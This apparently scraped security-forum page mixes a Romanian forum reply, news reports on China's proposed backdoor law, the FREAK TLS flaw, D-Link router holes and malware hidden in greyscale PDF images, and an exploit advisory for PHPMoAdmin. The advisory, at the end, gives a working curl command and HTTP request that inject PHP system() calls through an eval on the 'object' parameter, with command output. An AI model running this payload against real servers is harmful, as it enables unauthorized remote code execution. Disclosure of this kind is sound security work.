stop smb server... end end end Source

Salut si bine ai venit! ( corecteaza prezentarea )

@kamikazi, 1. probabil acel tip cu "flood-ul" e doar un copil. 2. RST ( Romanian Security Team ) nu s-ar baga niciodata in rahaturi de genu ( mai ales NU DDoS / DoS ) ( aici ma refer la Staff ) Probabil e doar un copil care nu are nici cea mai mica legatura cu RST ( daca a "agatat" pe aici un copil cu 10 posturi ce-l ajuta sa dea "flood" nu inseamna ca RST e implicat )

Beijing has rejected President Obama's criticism of its plan to make tech companies put backdoors in their software and share their encryption keys if they want to operate in China. On Monday, Mr Obama told the Reuters news agency he had "made it very clear" China had to change its policy if it wanted to do business with the US. But Beijing said it needed the powers to combat terrorism and tackle leaks. It also suggested the West was guilty of having double standards. "The legislation is China's domestic affair, and we hope the US side can take a right, sober and objective view towards it," said Chinese foreign ministry spokeswoman Hua Chunying. "On the information-security issue, there was a [recent] media revelation that a certain country embedded spying software in the computer system of another country's Sim card maker, for surveillance activities. This is only one out of the recently disclosed cases. "All countries are paying close attention to this and taking measures to safeguard their own information security, an act that is beyond any reproach." The case she was referring to involved allegations that US cyber-spies had hacked a Dutch Sim card manufacturer in order to help decrypt their targets' communications. At another press conference, parliamentary spokeswoman Fu Ying drew attention to the fact that the US government had imposed restrictions on Chinese companies including Huawei and ZTE. And she suggested that Beijing's proposals were in line with the same kind of access to internet correspondence sought by the US and British governments. "We will definitely continue to listen to extensive concerns and all the parties' views, so we can make the law's formulation more rigorous," she added. The rules are part of a proposed counter-terrorism law set to be discussed by China's annual parliament session, the National People's Congress (NPC), which opens on Thursday. 'Paranoid espionage' President Obama's comments had followed the publication of a fresh draft of the proposed law, which was made public last week. It "would essentially force all foreign companies, including US companies, to turn over to the Chinese government mechanisms where they can snoop and keep track of all the users of those services", the US leader said. "As you might imagine tech companies are not going to be willing to do that," he added. Microsoft, Cisco, Oracle and IBM are among firms that would potentially be affected. While the comments by Chinese officials were measured, the government's press service, Xinhua, was more critical. It accused the US leader of arrogance and hypocrisy, noting that the FBI had criticised Apple and Google last year for building encryption into their smartphone operating systems, and again drew attention to allegations about the US National Security Agency's activities made public by the whistleblower Edward Snowden. "With transparent procedures, China's anti-terrorism campaign will be different from what the United States has done: letting the surveillance authorities run amok and turn counter-terrorism into paranoid espionage and peeping on its civilians and allies," Xinhua wrote. "Contrary to the accusations of the United States, China's anti-terror law will put no unfair regulatory pressures on foreign companies, because the provisions will apply to both domestic and foreign firms." Insecure systems The Conservative party has indicated it wants to expand the UK's cyber-spies' surveillance powers it if wins the May election. US firms, including Microsoft, are hoping to boost profits by selling their services to China "Our manifesto will make clear that we will... use all the legal powers available to us to make sure that, where appropriate, the intelligence and security agencies have the maximum capability to intercept the communications of suspects while making sure that such intrusive techniques are properly overseen," Home Secretary Theresa May told Parliament in January. One expert said it should be no surprise that the West was finding it difficult to prevent China seeking greater cyber-surveillance powers of its own, but added there were good reasons to fear its proposals. "Either behind the scenes or increasingly openly, the US and UK are justifying similar behaviour for their own purposes, but are extremely concerned when China asks for its own capabilities," said Dr Joss Wright, from the Oxford Internet Institute. "But what we don't want to see is a world in which internet-based products and services are riddled with backdoors by every state that says it needs to act against terrorism. "A backdoor is always a concern because the moment it can be exploited, you have an insecure system by default, and that could make everyone less safe." Source

A new SSL/TLS vulnerability has been discovered that makes it possible to decrypt the HTTPS encryption protocols used between websites and browsers on Apple and Android devices. The flaw has been dubbed Freak (Factoring attack on RSA-Export Keys) and information on the specifically created freakattack.com website explains that it works by forcing a mobile device browser to use an older, breakable encryption standard. “The vulnerability allows attackers to intercept HTTPS connections between vulnerable clients and servers and force them to use ‘export-grade’ cryptography, which can then be decrypted or altered,” it said. “Vulnerable clients include many Google and Apple devices (which use unpatched OpenSSL), a large number of embedded systems, and many other software products that use TLS behind the scenes without disabling the vulnerable cryptographic suites.” The flaw was uncovered by a team of researchers at SmackTLS.com, who explained that the problem exists because of former US government policy concerning encryption technologies. “This attack targets a class of deliberately weak export cipher suites. As the name implies, this class of algorithms has been introduced under the pressure of US governments agencies to ensure that the National Security Agency would be able to decrypt all foreign encrypted communication, while stronger algorithms were banned from export as they were classified as weapons of war.” This means that attackers can force a server into deliberately using an encryption key that can be broken in about 12 hours. “Thus, if a server is willing to negotiate an export cipher suite, a man-in-the-middle [attack] may trick a browser (which normally doesn't allow it) to use a weak export key,” the team explained. Numerous high-profile websites are affected by the flaw, such as americanexpress.com, groupon.com and whitehouse.gov. Overall, almost 10 percent of the Alexa top million websites could be affected. V3 contacted Apple and Google for comment on the flaw but had received no reply at the time of publication. F-Secure researcher Sean Sullivan told V3 that the discovery underlined the risks of trying to control technology like encryption, something that David Cameron has recently made noises about in the UK. “In the 1990s there was this idea that they could control encryption and code as if it was a tangible thing and ban its export. Here we are 20 years later and you can see how that ideal has backfired,” he said. “Cameron is making this same point today, but our reliance on encryption is only increasing and, if you try to introduce some ‘weaker’ standards that you want to control, it will come back to haunt you.” Sullivan added that the risk to web users from the Freak flaw is more theoretical than anything else, as an attacker would need to compromise a website's server and then force a device to accept the older standard. Nevertheless, the incident demonstrates the risks posed by web browsers and the unintended consequences of trying to create two-tier technology systems. Source

Amnesia strikes as hacker discloses remote code exec flaws Domestic router Daddy D-Link is patching dangerous remote access flaws in several models of its networking gear. The patches follow a round of zero-day disclosures by Canadian researcher Peter Adkins early this week, after D-Link allegedly cut communication while he quietly disclosed the flaws. The most severe flaw allowed attackers to hijack the devices including changing DNS settings by creating malicious sites which exploit cross-site request forgeries. D-Link issued an advisory in which it warns DIR models 626L; 636L; 808L; 810L; 820L; 826L; 830, and 836L are open to remote code execution. D-Link says attackers can upload and run files without authentication from the LAN-side of the device or over the internet if the "external connections" box was taken off default and ticked. "A second vulnerability reportedly relates to the device’s ping utility that might permit command injection without authentication," the company says of Adkin's work. "A third vulnerability reportedly may exploit certain chipset utilities in firmware to potentially permit a malicious user an attack disclosing information about the devices configuration." Adkins told El Reg ,many of the security failings in home routers could be put down to expansive feature sets. "The platforms the devices are build upon may be solid - such as OpenWRT - but then additional services are 'bolted in' to provide value-add, and that security seems to go straight out of the window," Adkin says. Other routers may be affected due to the location of ncc and ncc2 binaries Fellow router hackers Stefan Viehböck and Jeremy Richards found further flaws in five TRENDnet offerings since patched, plus another D-Link mess. Adkins reports contact between D-Link and himself ceased around February 23 when D-Link, after confirming receipt of the vulnerability reports on 11 January, said they had no knowledge of the holes and directed him to the company security reporting guide. The company recommends users run encrypted wireless to prevent the low chance that passing hackers would break into the networks. Only the DIR-820L was patched. Source

Greyscale pics are a great place to hide malcode Hackers can duck antivirus programs and execute malware in Adobe Reader by using greyscale images, says Danish security boffin Dénes Óvári. Lossy compression is thought to be susceptible to the DCTDecode filter, which should nuke malware woven into images and blunt this form of attack. However new intelligence published in the paper Script in a Lossy Stream (PDF) shows bad guys and penetration testers can use the filter within PDF documents to hide malcode using JPEG images that are set to greyscale to avoid distortion. This process gives antivirus and human malware analysts the slip as they generally assume any malcode hiding in the JPEG filter will be compressed and scrambled. “Following the introduction of a sandbox for JavaScript code in Acrobat Reader, the use of PDF as an attack vector decreased dramatically,” Óvári says. “Although this is not a security breach in itself, the fact that the usage of DCTDecode for this purpose has seemingly been ruled out by the industry means that even known threats could be hidden in this way from anti-virus scanners or researchers. “In order to provide users with maximum protection, the DCTDecode stream must no longer be overlooked: in PDF reader implementations, the referencing of uncompressed image data as parameters from objects expecting binary data should be prohibited.” Óvári says attacks still require exploits to be used inside the DCTDecode stream, reducing the overall threat presented by the research. He created a proof of concept attack in which he says a script was encoded as a high-quality greyscale JPEG image, placed in an image object filtered with DCTDecode, and then referenced by a JavaScript action entry. “When opening the document, the alert dialog just pops up under the old Reader 9, proving that the code of the short script was decompressed losslessly,” he says. The attack still works under the latest version of Reader with some small modification. Óvári says other file formats that assume data within JPEGs uses lossy compression while a greyscale mode is available should be re-evaluated. Source

###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # PHPMoAdmin Unauthorized Remote Code Execution (0-Day) # Website : http://www.phpmoadmin.com/ # Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio # Release dates : March 3, 2015 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ PHPMoAdmin is a MongoDB administration tool for PHP built on a stripped-down version of the Vork high-performance framework. [+] Exploit ============================================================ Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ============================================================ PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 34 object=1;system('id;ls -lha');exit HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 16:57:40 GMT Server: Apache/2.4.7 (Ubuntu) Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 223 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html uid=33(www-data) gid=33(www-data) groups=33(www-data) total 116K drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 . drwxr-xr-x 6 root root 4.0K Mar 3 16:17 .. -rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php [+] Vulnerability Analysis ============================================================ Filename: moadmin.php 1. create new moadminComponent object 1977: $mo = new moadminComponent; 2. if the http-post parameter 'object' is set 738: class moadminComponent { ... 762: public function __construct() { ... 786: if (isset($_POST['object'])) { 787: if (self::$model->saveObject($_GET['collection'], $_POST['object'])) { ... 3. evaluate the value of 'object' as PHP code 692: public function saveObject($collection, $obj) { 693: eval('$obj=' . $obj . ';'); //cast from string to array Source